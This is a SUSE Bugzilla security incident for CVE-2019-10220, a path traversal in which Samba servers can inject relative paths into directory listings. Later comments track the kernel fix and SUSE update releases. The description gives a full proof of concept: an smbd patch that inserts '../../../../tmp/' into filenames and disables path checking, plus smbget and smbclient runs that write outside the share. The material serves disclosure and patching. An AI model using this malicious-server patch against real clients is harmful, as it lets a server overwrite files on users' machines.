1144903 – (CVE-2019-10220) VUL-0: CVE-2019-10220: kernel-source: Samba servers can inject relative paths in directory entry lists

Bug 1144903 (CVE-2019-10220) - VUL-0: CVE-2019-10220: kernel-source: Samba servers can inject relative paths in directory entry lists

Summary: VUL-0: CVE-2019-10220: kernel-source: Samba servers can inject relative paths...

Status:	RESOLVED FIXED

Alias:	CVE-2019-10220

Product:	SUSE Security Incidents
Classification:	Novell Products
Component:	Incidents (show other bugs)
Version:	unspecified
Hardware:	Other Other

Priority:	P3 - Medium Severity: Normal
Target Milestone:	---
Assignee:	SUSE Samba Team
QA Contact:	Security Team bot

URL:	https://smash.suse.de/issue/239273/
Whiteboard:	CVSSv3:SUSE:CVE-2019-10220:7.5:(AV:N/...
Keywords:

Depends on:
Blocks:

Clone This Bug

Reported:	2019-08-08 14:34 UTC by Johannes Segitz
Modified:	2024-06-25 13:55 UTC (History)
CC List:	9 users (show)

See Also:
Found By:	---
Services Priority:
Business Priority:
Blocker:	---
Marketing QA Status:	---
IT Deployment:	---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Johannes Segitz 2019-08-08 14:34:23 UTC

+++ This bug was initially created as a clone of Bug #1144902 +++

Author: Michael Hanselmann. Updated: August 4, 2019.

Samba client code, as well as the Linux kernel CIFS implementation, trust
filenames received from servers a bit too much. Other implementations may also
be affected. This vulnerability is comparable to CVE-2019-6111 which affected
OpenSSH.

A server may return a file entry list such as ["foo", "bar",
"../../../../../etc/passwd", "baz"] and client code making use of filenames
could be cajoled into overwriting, modifying or otherwise manipulating files
outside the share mountpoint.

In addition servers may supply VT100 terminal escape codes as part of filenames
(e.g. "poc-\x1B[31mwith-color\x1B[39m"; in POSIX filenames may contain anything
but NUL bytes) which are forwarded directly to the output of "smbget",
"smbclient" and possibly other programs without encoding, allowing a malicious
server to manipulate a terminal to a large degree. That is comparable to
CVE-2019-6109 which also affected OpenSSH.

Reproduction environment
------------------------

Samba compiled from master branch at commit
81186651eebf20e1ed7baf0116d5dbbc16d3d995 running in a Docker container with
Debian GNU/Linux buster, kernel Linux 4.9.0.

Reproduction
------------

Patch and build code:

---
patch -p1 <<'EOF'
--- a/source3/smbd/trans2.c
+++ b/source3/smbd/trans2.c
@@ -1899,6 +1899,10 @@ static NTSTATUS smbd_marshall_dir_entry(TALLOC_CTX *ctx,
        pad = 0;
        off = 0;

+       if (strncmp(fname, "poc", 3) == 0) {
+               fname = talloc_asprintf(talloc_tos(), "../../../../tmp/%s", fname);
+       }
+
        switch (info_level) {
        case SMB_FIND_INFO_STANDARD:
                DEBUG(10,("smbd_marshall_dir_entry: SMB_FIND_INFO_STANDARD\n"));
--- a/source3/smbd/reply.c
+++ b/source3/smbd/reply.c
@@ -227,7 +227,8 @@ static NTSTATUS check_path_syntax_internal(char *path,
 NTSTATUS check_path_syntax(char *path)
 {
        bool ignore;
-       return check_path_syntax_internal(path, False, &ignore);
+       check_path_syntax_internal(path, False, &ignore);
+       return NT_STATUS_OK;
 }

 /****************************************************************************
EOF

buildtools/bin/waf -j7 --targets=smbd/smbd,smbpasswd,smbget,client/smbclient build
---

Set up a share with access granted to a user, e.g.:

---
useradd johndoe
bin/smbpasswd -a johndoe

mkdir /srv/data
chown root:users /srv/data
chmod 1777 /srv/data

touch /srv/data/hello
touch /srv/data/poc.passwd
touch /srv/data/world

cat >/usr/local/samba/etc/smb.conf <<'EOF'
[data]
path = /srv/data
readonly = no
EOF
---

Run Samba server, e.g.:

---
bin/smbd -S -F --no-process-group
---

Mount share on client:

---
mount -t cifs -o username=johndoe,password=pass,vers=2.0 //172.17.0.2/data /mnt
---

List contents of mounted share:

---
$ find /mnt -type f
/mnt/../../../../tmp/poc.passwd
/mnt/world
/mnt/hello

$ python -c 'import os; print os.listdir("/mnt")'
['../../../../tmp/poc.passwd', 'world', 'hello']
---

Notice the server-controlled path pointing outside the mountpoint. Fortunately
some programs ignore such malformed directory entries, e.g. Bash in wildcard
expansion:

---
$ strace -e getdents64 -s256 -v bash -c 'echo /mnt/*'
getdents64(3, [{d_ino=210178, d_off=1, d_reclen=24, d_type=DT_DIR, d_name="."}, {d_ino=210178, d_off=4,
d_reclen=24, d_type=DT_DIR, d_name=".."}, {d_ino=278176443010627, d_off=5, d_reclen=48, d_type=DT_REG,
d_name="../../../../tmp/poc.passwd"}, {d_ino=278176443010628, d_off=6, d_reclen=32, d_type=DT_REG,
d_name="world"}, {d_ino=278176443010626, d_off=7, d_reclen=32, d_type=DT_REG, d_name="hello"}], 32768) = 160
getdents64(3, [], 32768)                = 0
/mnt/hello /mnt/world
+++ exited with 0 +++
---

"ls" from coreutils has the same behaviour:

---
$ strace -e getdents64 -s256 -v ls -l /mnt
getdents64(3, [{d_ino=210178, d_off=1, d_reclen=24, d_type=DT_DIR, d_name="."}, {d_ino=210178, d_off=4,
d_reclen=24, d_type=DT_DIR, d_name=".."}, {d_ino=278176443010627, d_off=5, d_reclen=48, d_type=DT_REG,
d_name="../../../../tmp/poc.passwd"}, {d_ino=278176443010628, d_off=6, d_reclen=32, d_type=DT_REG,
d_name="world"}, {d_ino=278176443010626, d_off=7, d_reclen=32, d_type=DT_REG, d_name="hello"}], 32768) = 160
getdents64(3, [], 32768)                = 0
total 0
-rwxr-xr-x 1 root root 0 Aug  4 10:30 hello
-rwxr-xr-x 1 root root 0 Aug  4 10:30 world
+++ exited with 0 +++
---

"smbget" is also affected as it naively appends the server-supplied filename to
the local path. The minimal proof-of-concept server-side code changes aren't
very polished, but sufficient for a demonstration:

---
$ cd /root; rmdir /tmp/poc.passwd; bin/smbget -U johndoe%pass -R smb://172.17.0.2/data/; find /tmp/poc.passwd -ls
rmdir: failed to remove '/tmp/poc.passwd': No such file or directory
…
Can't create directory ../../../../tmp/poc.passwd/[…]/../../../../tmp/poc.passwd: File name too long
…
   237742      0 drwxr-xr-x   2 root     root           40 Aug  4 11:12 /tmp/poc.passwd
---

The reason lies in how "source3/utils/smbget.c" treats remote paths (the author
wonders whether the code paths for other "SMBC_*" values could also be reached
and what would be possible with that):

---
static bool smb_download_dir(const char *base, const char *name, int resume)
{
…
  snprintf(path, SMB_MAXPATHLEN-1, "%s%s%s", base,
           (base[0] && name[0] && name[0] != '/' &&
            base[strlen(base)-1] != '/') ? "/" : "",
           name);
…

  while ((dirent = smbc_readdir(dirhandle))) {
…
    case SMBC_DIR:
      ok = smb_download_dir(base, newname, resume);
      break;
…
    case SMBC_FILE:
      ok = smb_download_file(base, newname, true, resume,
                             false, NULL);
      break;
…
}
…
static bool smb_download_file(const char *base, const char *name,
                              bool recursive, bool resume, bool toplevel,
                              char *outfile)
{
…
  if (outfile) {
    newpath = outfile;
  } else if (!name[0]) {
    newpath = strrchr(base, '/');
    if (newpath) {
      newpath++;
    } else {
      newpath = base;
    }
  } else {
    newpath = name;
  }
…
    localhandle = open(newpath, O_CREAT | O_NONBLOCK | O_RDWR |
                                    (!resume ? O_EXCL : 0),
                       0755);
…
}
---

"smbclient" is also affected. First we need to create a dummy file, though this
could be handled by server-side code as well.

---
mkdir /srv/data/tmp
date > /srv/data/tmp/poc.passwd
---

Then on the client:

---
$ cat /tmp/poc.passwd
cat: /tmp/poc.passwd: No such file or directory

$ strace -e trace=file bin/smbclient -U johndoe%pass //172.17.0.2/data "" -c 'lcd /root; prompt off; mget *passwd'
…
chdir("/root")                          = 0
getcwd("/root", 4096)                   = 6
openat(AT_FDCWD, "../../../../tmp/poc.passwd", O_WRONLY|O_CREAT|O_TRUNC, 0644) = 8
getting file \tmp\poc.passwd of size 29 as ../../../../tmp/poc.passwd (1.0 KiloBytes/sec) (average 1.0
KiloBytes/sec)
+++ exited with 0 +++

$ cat /tmp/poc.passwd
Sun Aug  4 11:16:50 UTC 2019

Comment 8 Aurelien Aptel 2019-08-28 12:27:25 UTC

Ok I've added you. Stefan commented that there are no CRD for this yet.

Comment 11 Marcus Meissner 2019-10-07 06:36:01 UTC

Fix looks like it was done in VFS                                                                                                                                                            
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/fs?id=4f11918ab93bc113ec0831ed2ab7b88847d44dd7

Comment 12 Aurelien Aptel 2019-10-08 16:06:01 UTC

There are issues with this fix with architectures that don't support unaligned access https://lkml.kernel.org/r/20191006222046.GA18027@roeck-us.net

They are still working on it, I'll wait a bit before merging.

Comment 20 Marcus Meissner 2019-10-30 10:29:28 UTC

was more or less silently published, but is public now.

Comment 21 Marcus Meissner 2019-10-30 10:29:46 UTC

https://bugzilla.samba.org/show_bug.cgi?id=14072

Comment 22 Aurelien Aptel 2019-10-30 12:42:37 UTC

ok I pushed again for these branches:

- cve/linux-3.0
- cve/linux-3.12
- cve/linux-4.4
- SLE15
- SLE15-SP2

Comment 23 Swamp Workflow Management 2019-10-30 14:13:31 UTC

SUSE-SU-2019:2821-1: An update that solves 8 vulnerabilities and has 8 fixes is now available.

Category: security (important)
Bug References: 1102682,1103203,1133191,1136446,1137597,1140747,1144903,1151021,1153108,1153158,1153161,904970,907150,920615,920633,930408
CVE References: CVE-2018-5390,CVE-2019-10220,CVE-2019-11477,CVE-2019-11478,CVE-2019-11487,CVE-2019-14835,CVE-2019-17133,CVE-2019-3846
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP1 (src):    kgraft-patch-SLE12-SP1_Update_33-6-2.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src):    kgraft-patch-SLE12-SP1_Update_33-6-2.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 24 Swamp Workflow Management 2019-10-30 17:14:07 UTC

SUSE-SU-2019:2864-1: An update that solves three vulnerabilities and has 9 fixes is now available.

Category: security (important)
Bug References: 1103203,1144903,1149841,1151021,1153108,1153158,1153161,904970,907150,920615,920633,930408
CVE References: CVE-2019-10220,CVE-2019-14835,CVE-2019-17133
Sources used:
SUSE Linux Enterprise Module for Live Patching 15-SP1 (src):    kernel-livepatch-SLE15-SP1_Update_4-3-2.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 25 Swamp Workflow Management 2019-10-30 17:16:10 UTC

SUSE-SU-2019:2859-1: An update that solves two vulnerabilities and has three fixes is now available.

Category: security (important)
Bug References: 1144903,1149841,1153108,1153158,1153161
CVE References: CVE-2019-10220,CVE-2019-17133
Sources used:
SUSE Linux Enterprise Module for Live Patching 15-SP1 (src):    kernel-livepatch-SLE15-SP1_Update_5-2-2.1
SUSE Linux Enterprise Module for Live Patching 15 (src):    kernel-livepatch-SLE15_Update_14-2-2.1
SUSE Linux Enterprise Live Patching 12-SP4 (src):    kgraft-patch-SLE12-SP4_Update_8-2-2.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 26 Swamp Workflow Management 2019-10-30 17:18:16 UTC

SUSE-SU-2019:2829-1: An update that solves two vulnerabilities and has two fixes is now available.

Category: security (important)
Bug References: 1144903,1153108,1153158,1153161
CVE References: CVE-2019-10220,CVE-2019-17133
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    kgraft-patch-SLE12-SP3_Update_20-8-2.1, kgraft-patch-SLE12-SP3_Update_21-7-2.1, kgraft-patch-SLE12-SP3_Update_22-7-2.1, kgraft-patch-SLE12-SP3_Update_23-6-2.1, kgraft-patch-SLE12-SP3_Update_24-5-2.1, kgraft-patch-SLE12-SP3_Update_25-5-2.1, kgraft-patch-SLE12-SP3_Update_26-5-2.1, kgraft-patch-SLE12-SP3_Update_27-3-2.1, kgraft-patch-SLE12-SP3_Update_28-3-2.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    kgraft-patch-SLE12-SP2_Update_26-8-2.1, kgraft-patch-SLE12-SP2_Update_27-6-2.1, kgraft-patch-SLE12-SP2_Update_28-6-2.1, kgraft-patch-SLE12-SP2_Update_29-6-2.1, kgraft-patch-SLE12-SP2_Update_30-5-2.1, kgraft-patch-SLE12-SP2_Update_31-4-2.1, kgraft-patch-SLE12-SP2_Update_32-3-2.1
SUSE Linux Enterprise Server for SAP 12-SP1 (src):    kgraft-patch-SLE12-SP1_Update_34-5-2.1, kgraft-patch-SLE12-SP1_Update_35-3-2.1, kgraft-patch-SLE12-SP1_Update_36-3-2.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    kgraft-patch-SLE12-SP3_Update_20-8-2.1, kgraft-patch-SLE12-SP3_Update_21-7-2.1, kgraft-patch-SLE12-SP3_Update_22-7-2.1, kgraft-patch-SLE12-SP3_Update_23-6-2.1, kgraft-patch-SLE12-SP3_Update_24-5-2.1, kgraft-patch-SLE12-SP3_Update_25-5-2.1, kgraft-patch-SLE12-SP3_Update_26-5-2.1, kgraft-patch-SLE12-SP3_Update_27-3-2.1, kgraft-patch-SLE12-SP3_Update_28-3-2.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    kgraft-patch-SLE12-SP2_Update_26-8-2.1, kgraft-patch-SLE12-SP2_Update_27-6-2.1, kgraft-patch-SLE12-SP2_Update_28-6-2.1, kgraft-patch-SLE12-SP2_Update_29-6-2.1, kgraft-patch-SLE12-SP2_Update_30-5-2.1, kgraft-patch-SLE12-SP2_Update_31-4-2.1, kgraft-patch-SLE12-SP2_Update_32-3-2.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src):    kgraft-patch-SLE12-SP1_Update_34-5-2.1, kgraft-patch-SLE12-SP1_Update_35-3-2.1, kgraft-patch-SLE12-SP1_Update_36-3-2.1
SUSE Linux Enterprise Module for Live Patching 15-SP1 (src):    kernel-livepatch-SLE15-SP1_Update_0-7-19.1, kernel-livepatch-SLE15-SP1_Update_1-6-2.1, kernel-livepatch-SLE15-SP1_Update_2-5-2.1, kernel-livepatch-SLE15-SP1_Update_3-3-2.1, kernel-livepatch-SLE15-SP1_Update_6-2-2.1
SUSE Linux Enterprise Module for Live Patching 15 (src):    kernel-livepatch-SLE15_Update_10-5-2.1, kernel-livepatch-SLE15_Update_11-4-2.1, kernel-livepatch-SLE15_Update_12-3-2.1, kernel-livepatch-SLE15_Update_13-3-2.1, kernel-livepatch-SLE15_Update_15-2-2.1, kernel-livepatch-SLE15_Update_7-7-2.1, kernel-livepatch-SLE15_Update_8-6-2.1, kernel-livepatch-SLE15_Update_9-5-2.1
SUSE Linux Enterprise Live Patching 12-SP4 (src):    kgraft-patch-SLE12-SP4_Update_0-8-2.22.1, kgraft-patch-SLE12-SP4_Update_1-7-2.1, kgraft-patch-SLE12-SP4_Update_2-6-2.1, kgraft-patch-SLE12-SP4_Update_3-5-2.1, kgraft-patch-SLE12-SP4_Update_4-5-2.1, kgraft-patch-SLE12-SP4_Update_5-4-2.1, kgraft-patch-SLE12-SP4_Update_6-3-2.1, kgraft-patch-SLE12-SP4_Update_7-3-2.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 39 Swamp Workflow Management 2019-11-12 19:01:56 UTC

This is an autogenerated message for OBS integration:
This bug (1144903) was mentioned in
https://build.opensuse.org/request/show/747901 15.0 / kernel-source

Comment 40 Swamp Workflow Management 2019-11-12 22:51:22 UTC

This is an autogenerated message for OBS integration:
This bug (1144903) was mentioned in
https://build.opensuse.org/request/show/747951 15.1 / kernel-source

Comment 41 Swamp Workflow Management 2019-11-12 23:14:59 UTC

SUSE-SU-2019:2948-1: An update that solves 6 vulnerabilities and has 30 fixes is now available.

Category: security (important)
Bug References: 1051510,1082635,1083647,1090631,1096254,1117665,1119461,1119465,1123034,1135966,1135967,1137040,1138190,1139073,1140090,1143706,1144338,1144903,1146612,1149119,1150457,1151225,1152624,1153476,1153509,1153969,1154737,1154848,1154858,1154905,1154959,1155178,1155179,1155184,1155186,1155671
CVE References: CVE-2018-12207,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-16233
Sources used:
SUSE Linux Enterprise Live Patching 12-SP4 (src):    kernel-default-4.12.14-95.40.1, kgraft-patch-SLE12-SP4_Update_10-1-6.3.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 42 Swamp Workflow Management 2019-11-12 23:21:17 UTC

SUSE-SU-2019:2949-1: An update that solves 49 vulnerabilities and has 18 fixes is now available.

Category: security (important)
Bug References: 1051510,1084878,1117665,1131107,1133140,1135966,1135967,1136261,1137865,1139073,1140671,1141013,1141054,1142458,1143187,1144123,1144903,1145477,1146042,1146163,1146285,1146361,1146378,1146391,1146413,1146425,1146512,1146514,1146516,1146519,1146524,1146526,1146529,1146540,1146543,1146547,1146550,1146584,1146589,1147022,1147122,1148394,1148938,1149083,1149376,1149522,1149527,1149555,1149612,1150025,1150112,1150452,1150457,1150465,1150727,1150942,1151347,1151350,1152685,1152782,1152788,1153158,1153263,1154103,1154372,1155131,1155671
CVE References: CVE-2016-10906,CVE-2017-18379,CVE-2017-18509,CVE-2017-18551,CVE-2017-18595,CVE-2018-12207,CVE-2018-20976,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-13272,CVE-2019-14814,CVE-2019-14815,CVE-2019-14816,CVE-2019-14821,CVE-2019-14835,CVE-2019-15098,CVE-2019-15211,CVE-2019-15212,CVE-2019-15214,CVE-2019-15215,CVE-2019-15216,CVE-2019-15217,CVE-2019-15218,CVE-2019-15219,CVE-2019-15220,CVE-2019-15221,CVE-2019-15239,CVE-2019-15290,CVE-2019-15291,CVE-2019-15505,CVE-2019-15666,CVE-2019-15807,CVE-2019-15902,CVE-2019-15924,CVE-2019-15926,CVE-2019-15927,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16413,CVE-2019-16995,CVE-2019-17055,CVE-2019-17056,CVE-2019-17133,CVE-2019-17666,CVE-2019-9456,CVE-2019-9506
Sources used:
SUSE OpenStack Cloud Crowbar 8 (src):    kernel-default-4.4.180-94.107.1, kernel-source-4.4.180-94.107.1, kernel-syms-4.4.180-94.107.1
SUSE OpenStack Cloud 8 (src):    kernel-default-4.4.180-94.107.1, kernel-source-4.4.180-94.107.1, kernel-syms-4.4.180-94.107.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    kernel-default-4.4.180-94.107.1, kernel-source-4.4.180-94.107.1, kernel-syms-4.4.180-94.107.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    kernel-default-4.4.180-94.107.1, kernel-source-4.4.180-94.107.1, kernel-syms-4.4.180-94.107.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    kernel-default-4.4.180-94.107.1, kernel-source-4.4.180-94.107.1, kernel-syms-4.4.180-94.107.1
SUSE Linux Enterprise High Availability 12-SP3 (src):    kernel-default-4.4.180-94.107.1
SUSE Enterprise Storage 5 (src):    kernel-default-4.4.180-94.107.1, kernel-source-4.4.180-94.107.1, kernel-syms-4.4.180-94.107.1
SUSE CaaS Platform 3.0 (src):    kernel-default-4.4.180-94.107.1
HPE Helion Openstack 8 (src):    kernel-default-4.4.180-94.107.1, kernel-source-4.4.180-94.107.1, kernel-syms-4.4.180-94.107.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 43 Swamp Workflow Management 2019-11-12 23:36:17 UTC

SUSE-SU-2019:2952-1: An update that solves 10 vulnerabilities and has 111 fixes is now available.

Category: security (important)
Bug References: 1046299,1046303,1046305,1050244,1050536,1050545,1051510,1055186,1061840,1064802,1065600,1066129,1073513,1082635,1083647,1086323,1087092,1089644,1090631,1093205,1096254,1097583,1097584,1097585,1097586,1097587,1097588,1098291,1101674,1109158,1111666,1112178,1113994,1114279,1117665,1119461,1119465,1123034,1123080,1133140,1134303,1135642,1135854,1135873,1135967,1137040,1137799,1137861,1138190,1140090,1140729,1140845,1140883,1141600,1142635,1142667,1143706,1144338,1144375,1144449,1144903,1145099,1146612,1148410,1149119,1149853,1150452,1150457,1150465,1150875,1151508,1151807,1152033,1152624,1152665,1152685,1152696,1152697,1152788,1152790,1152791,1153112,1153158,1153236,1153263,1153476,1153509,1153607,1153646,1153681,1153713,1153717,1153718,1153719,1153811,1153969,1154108,1154189,1154242,1154268,1154354,1154372,1154521,1154578,1154607,1154608,1154610,1154611,1154651,1154737,1154747,1154848,1154858,1154905,1154956,1155061,1155178,1155179,1155184,1155186,1155671
CVE References: CVE-2018-12207,CVE-2019-10220,CVE-2019-11135,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16995,CVE-2019-17056,CVE-2019-17133,CVE-2019-17666
Sources used:
SUSE Linux Enterprise Module for Public Cloud 15-SP1 (src):    kernel-azure-4.12.14-8.19.1, kernel-source-azure-4.12.14-8.19.1, kernel-syms-azure-4.12.14-8.19.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 44 Swamp Workflow Management 2019-11-12 23:53:37 UTC

SUSE-SU-2019:2946-1: An update that solves 12 vulnerabilities and has 93 fixes is now available.

Category: security (important)
Bug References: 1046299,1046303,1046305,1050244,1050536,1050545,1051510,1055186,1061840,1064802,1065600,1066129,1073513,1082635,1083647,1086323,1087092,1089644,1090631,1093205,1096254,1097583,1097584,1097585,1097586,1097587,1097588,1098291,1101674,1109158,1114279,1117665,1119461,1119465,1123034,1123080,1133140,1134303,1135642,1135854,1135873,1135966,1135967,1137040,1137799,1138190,1139073,1140090,1140729,1140845,1140883,1141600,1142635,1142667,1143706,1144338,1144375,1144449,1144903,1145099,1146612,1148410,1149119,1150452,1150457,1150465,1150875,1151508,1152624,1152685,1152788,1152791,1153112,1153158,1153236,1153263,1153476,1153509,1153646,1153713,1153717,1153718,1153719,1153811,1153969,1154108,1154189,1154354,1154372,1154578,1154607,1154608,1154610,1154611,1154651,1154737,1154747,1154848,1154858,1154905,1155178,1155179,1155184,1155186,1155671
CVE References: CVE-2018-12207,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16995,CVE-2019-17056,CVE-2019-17133,CVE-2019-17666
Sources used:
SUSE Linux Enterprise Module for Live Patching 15 (src):    kernel-default-4.12.14-150.41.1, kernel-livepatch-SLE15_Update_16-1-1.3.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 45 Swamp Workflow Management 2019-11-13 00:13:04 UTC

SUSE-SU-2019:2953-1: An update that solves 12 vulnerabilities and has 115 fixes is now available.

Category: security (important)
Bug References: 1046299,1046303,1046305,1050244,1050536,1050545,1051510,1055186,1061840,1064802,1065600,1066129,1073513,1082635,1083647,1086323,1087092,1089644,1090631,1093205,1096254,1097583,1097584,1097585,1097586,1097587,1097588,1098291,1101674,1109158,1114279,1117665,1119461,1119465,1122363,1123034,1123080,1127155,1133140,1134303,1135642,1135854,1135873,1135967,1137040,1137799,1137861,1138190,1139073,1140090,1140729,1140845,1140883,1141600,1142635,1142667,1143706,1144338,1144375,1144449,1144903,1145099,1146612,1148410,1149119,1150452,1150457,1150465,1150875,1151225,1151508,1151680,1152497,1152505,1152506,1152624,1152685,1152782,1152788,1152791,1153108,1153112,1153158,1153236,1153263,1153476,1153509,1153646,1153681,1153713,1153717,1153718,1153719,1153811,1153969,1154108,1154189,1154354,1154372,1154578,1154607,1154608,1154610,1154611,1154651,1154737,1154747,1154848,1154858,1154905,1154956,1154959,1155178,1155179,1155184,1155186,1155671,1155692,1155812,1155817,1155836,1155945,1155982,1156187,919448,987367,998153
CVE References: CVE-2018-12207,CVE-2019-10220,CVE-2019-11135,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16995,CVE-2019-17055,CVE-2019-17056,CVE-2019-17133,CVE-2019-17666,CVE-2019-18805
Sources used:
SUSE Linux Enterprise Server 12-SP4 (src):    kernel-azure-4.12.14-6.29.1, kernel-source-azure-4.12.14-6.29.1, kernel-syms-azure-4.12.14-6.29.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 46 Swamp Workflow Management 2019-11-13 00:30:44 UTC

SUSE-SU-2019:2947-1: An update that solves 10 vulnerabilities and has 117 fixes is now available.

Category: security (important)
Bug References: 1046299,1046303,1046305,1050244,1050536,1050545,1051510,1055186,1061840,1064802,1065600,1066129,1073513,1082635,1083647,1086323,1087092,1089644,1090631,1093205,1096254,1097583,1097584,1097585,1097586,1097587,1097588,1098291,1101674,1109158,1111666,1112178,1113994,1114279,1117665,1119461,1119465,1123034,1123080,1133140,1134303,1135642,1135854,1135873,1135967,1137040,1137799,1137861,1138190,1139073,1140090,1140729,1140845,1140883,1141600,1142635,1142667,1143706,1144338,1144375,1144449,1144903,1145099,1146612,1148410,1149119,1149853,1150452,1150457,1150465,1150875,1151508,1151807,1152033,1152624,1152665,1152685,1152696,1152697,1152788,1152790,1152791,1153112,1153158,1153236,1153263,1153476,1153509,1153607,1153646,1153681,1153713,1153717,1153718,1153719,1153811,1153969,1154108,1154189,1154242,1154268,1154354,1154372,1154521,1154578,1154607,1154608,1154610,1154611,1154651,1154737,1154747,1154848,1154858,1154905,1154956,1155061,1155178,1155179,1155184,1155186,1155671,802154,814594,919448,987367,998153
CVE References: CVE-2018-12207,CVE-2019-10220,CVE-2019-11135,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16995,CVE-2019-17056,CVE-2019-17133,CVE-2019-17666
Sources used:
SUSE Linux Enterprise Module for Live Patching 15-SP1 (src):    kernel-default-4.12.14-197.26.1, kernel-livepatch-SLE15-SP1_Update_7-1-3.5.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 47 Swamp Workflow Management 2019-11-13 00:43:40 UTC

SUSE-SU-2019:2948-1: An update that solves 6 vulnerabilities and has 30 fixes is now available.

Category: security (important)
Bug References: 1051510,1082635,1083647,1090631,1096254,1117665,1119461,1119465,1123034,1135966,1135967,1137040,1138190,1139073,1140090,1143706,1144338,1144903,1146612,1149119,1150457,1151225,1152624,1153476,1153509,1153969,1154737,1154848,1154858,1154905,1154959,1155178,1155179,1155184,1155186,1155671
CVE References: CVE-2018-12207,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-16233
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP4 (src):    kernel-default-4.12.14-95.40.1
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    kernel-docs-4.12.14-95.40.1, kernel-obs-build-4.12.14-95.40.2
SUSE Linux Enterprise Server 12-SP4 (src):    kernel-default-4.12.14-95.40.1, kernel-source-4.12.14-95.40.1, kernel-syms-4.12.14-95.40.1
SUSE Linux Enterprise Live Patching 12-SP4 (src):    kernel-default-4.12.14-95.40.1, kgraft-patch-SLE12-SP4_Update_10-1-6.3.1
SUSE Linux Enterprise High Availability 12-SP4 (src):    kernel-default-4.12.14-95.40.1
SUSE Linux Enterprise Desktop 12-SP4 (src):    kernel-default-4.12.14-95.40.1, kernel-source-4.12.14-95.40.1, kernel-syms-4.12.14-95.40.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 48 Swamp Workflow Management 2019-11-13 00:55:22 UTC

SUSE-SU-2019:2946-1: An update that solves 12 vulnerabilities and has 93 fixes is now available.

Category: security (important)
Bug References: 1046299,1046303,1046305,1050244,1050536,1050545,1051510,1055186,1061840,1064802,1065600,1066129,1073513,1082635,1083647,1086323,1087092,1089644,1090631,1093205,1096254,1097583,1097584,1097585,1097586,1097587,1097588,1098291,1101674,1109158,1114279,1117665,1119461,1119465,1123034,1123080,1133140,1134303,1135642,1135854,1135873,1135966,1135967,1137040,1137799,1138190,1139073,1140090,1140729,1140845,1140883,1141600,1142635,1142667,1143706,1144338,1144375,1144449,1144903,1145099,1146612,1148410,1149119,1150452,1150457,1150465,1150875,1151508,1152624,1152685,1152788,1152791,1153112,1153158,1153236,1153263,1153476,1153509,1153646,1153713,1153717,1153718,1153719,1153811,1153969,1154108,1154189,1154354,1154372,1154578,1154607,1154608,1154610,1154611,1154651,1154737,1154747,1154848,1154858,1154905,1155178,1155179,1155184,1155186,1155671
CVE References: CVE-2018-12207,CVE-2019-0154,CVE-2019-0155,CVE-2019-10220,CVE-2019-11135,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16995,CVE-2019-17056,CVE-2019-17133,CVE-2019-17666
Sources used:
SUSE Linux Enterprise Workstation Extension 15 (src):    kernel-default-4.12.14-150.41.1
SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (src):    kernel-default-4.12.14-150.41.1, kernel-docs-4.12.14-150.41.1, kernel-obs-qa-4.12.14-150.41.1
SUSE Linux Enterprise Module for Live Patching 15 (src):    kernel-default-4.12.14-150.41.1, kernel-livepatch-SLE15_Update_16-1-1.3.1
SUSE Linux Enterprise Module for Legacy Software 15 (src):    kernel-default-4.12.14-150.41.1
SUSE Linux Enterprise Module for Development Tools 15 (src):    kernel-docs-4.12.14-150.41.1, kernel-obs-build-4.12.14-150.41.1, kernel-source-4.12.14-150.41.1, kernel-syms-4.12.14-150.41.1, kernel-vanilla-4.12.14-150.41.1
SUSE Linux Enterprise Module for Basesystem 15 (src):    kernel-default-4.12.14-150.41.1, kernel-source-4.12.14-150.41.1, kernel-zfcpdump-4.12.14-150.41.1
SUSE Linux Enterprise High Availability 15 (src):    kernel-default-4.12.14-150.41.1

